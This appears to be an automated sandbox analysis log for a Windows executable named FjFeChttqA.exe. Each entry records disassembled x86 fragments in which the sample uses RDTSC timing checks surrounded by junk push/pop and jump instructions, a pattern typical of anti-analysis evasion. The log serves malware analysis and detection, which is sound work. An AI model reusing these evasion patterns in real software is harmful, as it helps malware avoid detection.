                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1276816 second address: 1276829 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D692C6EEEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnl 00007F5D692C6EE6h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1276829 second address: 1276835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128AF78 second address: 128AF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1289D6A second address: 1289D7B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D68C8BFFAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A1D2 second address: 128A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EF8h 0x00000009 jng 00007F5D692C6EE6h 0x0000000f popad 0x00000010 jmp 00007F5D692C6EEAh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A203 second address: 128A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A32A second address: 128A347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EF9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A347 second address: 128A34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A669 second address: 128A673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A673 second address: 128A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5D68C8C009h 0x0000000a push ecx 0x0000000b jmp 00007F5D68C8BFFCh 0x00000010 pop ecx 0x00000011 popad 0x00000012 push edx 0x00000013 jp 00007F5D68C8BFFCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A6A9 second address: 128A6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F5D692C6EE6h 0x0000000c js 00007F5D692C6EE6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A80F second address: 128A815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A815 second address: 128A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A81B second address: 128A821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A821 second address: 128A826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A826 second address: 128A82C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A980 second address: 128A9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5D692C6EF7h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A9A3 second address: 128A9A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A9A8 second address: 128A9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EEBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 129075D second address: 129076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F5D68C8BFFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290C6D second address: 1290C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EEAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290C7B second address: 1290D39 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F5D68C8C001h 0x00000013 jmp 00007F5D68C8BFFBh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F5D68C8BFF8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 jmp 00007F5D68C8C003h 0x00000038 mov dword ptr [ebp+122D1E51h], edi 0x0000003e push dword ptr [ebp+122D3889h] 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F5D68C8BFF8h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000016h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jmp 00007F5D68C8C007h 0x00000063 or dh, FFFFFF94h 0x00000066 call 00007F5D68C8BFF9h 0x0000006b jmp 00007F5D68C8BFFDh 0x00000070 push eax 0x00000071 jmp 00007F5D68C8BFFBh 0x00000076 mov eax, dword ptr [esp+04h] 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290D39 second address: 1290D43 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290D43 second address: 1290D76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5D68C8C009h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F5D68C8BFFAh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12926D0 second address: 12926E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F5D692C6EE8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12926E4 second address: 12926EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F5D68C8BFF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12926EE second address: 12926F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1294183 second address: 1294189 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A6066 second address: 11A606B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A026E second address: 56A030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D68C8BFFFh 0x00000009 adc ax, 78DEh 0x0000000e jmp 00007F5D68C8C009h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F5D68C8C000h 0x0000001a xor si, 38D8h 0x0000001f jmp 00007F5D68C8BFFBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5D68C8C004h 0x00000030 adc cl, 00000038h 0x00000033 jmp 00007F5D68C8BFFBh 0x00000038 popfd 0x00000039 pushad 0x0000003a mov eax, 2C9A6705h 0x0000003f jmp 00007F5D68C8C002h 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A030C second address: 56A0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A0310 second address: 56A0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A0316 second address: 56A033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D692C6EF8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A033B second address: 56A0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, DB3Bh 0x00000010 call 00007F5D68C8C000h 0x00000015 mov dx, cx 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F5D68C8BFFDh 0x00000022 mov ecx, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5D68C8BFFDh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0698 second address: 56C069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C069D second address: 56C06D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov bl, ch 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F5D68C8BFFAh 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5D68C8C007h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C06D8 second address: 56C06F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EF4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C06F0 second address: 56C06F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C06F4 second address: 56C071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F5D692C6EF7h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, 60h 0x00000015 mov bx, si 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C071F second address: 56C0725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0725 second address: 56C0729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0729 second address: 56C072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C072D second address: 56C07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5D692C6EEEh 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 call 00007F5D692C6EEEh 0x00000015 mov dl, cl 0x00000017 pop edx 0x00000018 popad 0x00000019 push ecx 0x0000001a pushad 0x0000001b mov dx, si 0x0000001e pushfd 0x0000001f jmp 00007F5D692C6EF0h 0x00000024 sbb eax, 4DA63278h 0x0000002a jmp 00007F5D692C6EEBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esp], esi 0x00000034 jmp 00007F5D692C6EF6h 0x00000039 lea eax, dword ptr [ebp-04h] 0x0000003c pushad 0x0000003d mov dx, cx 0x00000040 mov di, ax 0x00000043 popad 0x00000044 nop 0x00000045 jmp 00007F5D692C6EF4h 0x0000004a push eax 0x0000004b pushad 0x0000004c jmp 00007F5D692C6EF1h 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C07D0 second address: 56C0808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5D68C8C005h 0x00000010 xor al, FFFFFF86h 0x00000013 jmp 00007F5D68C8C001h 0x00000018 popfd 0x00000019 push ecx 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0808 second address: 56C0841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D692C6EF3h 0x00000009 xor esi, 58B667BEh 0x0000000f jmp 00007F5D692C6EF9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0841 second address: 56C0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, ax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0899 second address: 56C089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C089D second address: 56C08A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0903 second address: 56C095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5D692C6EF7h 0x00000008 pop eax 0x00000009 mov ax, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, esi 0x00000011 pushad 0x00000012 push ebx 0x00000013 mov eax, 653FADE3h 0x00000018 pop eax 0x00000019 call 00007F5D692C6EF9h 0x0000001e jmp 00007F5D692C6EF0h 0x00000023 pop ecx 0x00000024 popad 0x00000025 pop esi 0x00000026 pushad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0215 second address: 56B021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B021B second address: 56B021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B02D1 second address: 56B02FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D68C8BFFAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B02FC second address: 56B0321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D692C6EF2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0321 second address: 56B0327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0327 second address: 56B032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B032B second address: 56B0345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0345 second address: 56B0349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0349 second address: 56B034D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B034D second address: 56B0353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0353 second address: 56B0404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C002h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov cl, 74h 0x0000000e pushfd 0x0000000f jmp 00007F5D68C8C003h 0x00000014 jmp 00007F5D68C8C003h 0x00000019 popfd 0x0000001a popad 0x0000001b je 00007F5D68C8C18Ah 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5D68C8C004h 0x00000028 xor ax, FA38h 0x0000002d jmp 00007F5D68C8BFFBh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F5D68C8C008h 0x00000039 sub ax, F498h 0x0000003e jmp 00007F5D68C8BFFBh 0x00000043 popfd 0x00000044 popad 0x00000045 lea ecx, dword ptr [ebp-14h] 0x00000048 pushad 0x00000049 mov eax, 0D922C6Bh 0x0000004e mov edi, eax 0x00000050 popad 0x00000051 mov dword ptr [ebp-14h], edi 0x00000054 pushad 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0451 second address: 56B0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0457 second address: 56B045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B045D second address: 56B0461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B048C second address: 56B0490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0490 second address: 56B0496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0496 second address: 56B04D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F5D68C8C000h 0x00000010 jg 00007F5DD9079FCCh 0x00000016 pushad 0x00000017 mov edx, eax 0x00000019 mov eax, 4FB0C389h 0x0000001e popad 0x0000001f js 00007F5D68C8C05Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5D68C8BFFBh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B04D8 second address: 56B056B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushfd 0x00000010 jmp 00007F5D692C6EF8h 0x00000015 sbb cx, 3468h 0x0000001a jmp 00007F5D692C6EEBh 0x0000001f popfd 0x00000020 popad 0x00000021 jne 00007F5DD96B4E5Bh 0x00000027 pushad 0x00000028 movzx esi, di 0x0000002b popad 0x0000002c mov ebx, dword ptr [ebp+08h] 0x0000002f jmp 00007F5D692C6EEAh 0x00000034 lea eax, dword ptr [ebp-2Ch] 0x00000037 jmp 00007F5D692C6EF0h 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5D692C6EF7h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B056B second address: 56B05E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F5D68C8C000h 0x0000000c adc esi, 5120BB88h 0x00000012 jmp 00007F5D68C8BFFBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F5D68C8BFFFh 0x00000023 or cx, 2FCEh 0x00000028 jmp 00007F5D68C8C009h 0x0000002d popfd 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 call 00007F5D68C8C008h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B05E7 second address: 56B0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5D692C6EF1h 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0604 second address: 56B0648 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F5D68C8C005h 0x0000000d add si, 56C6h 0x00000012 jmp 00007F5D68C8C001h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5D68C8BFFCh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0648 second address: 56B064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B064E second address: 56B0652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0652 second address: 56B066E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov dh, 5Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B066E second address: 56B06BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D68C8C001h 0x00000009 sub ax, 1036h 0x0000000e jmp 00007F5D68C8C001h 0x00000013 popfd 0x00000014 mov eax, 36A8B027h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5D68C8C009h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0725 second address: 56B072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
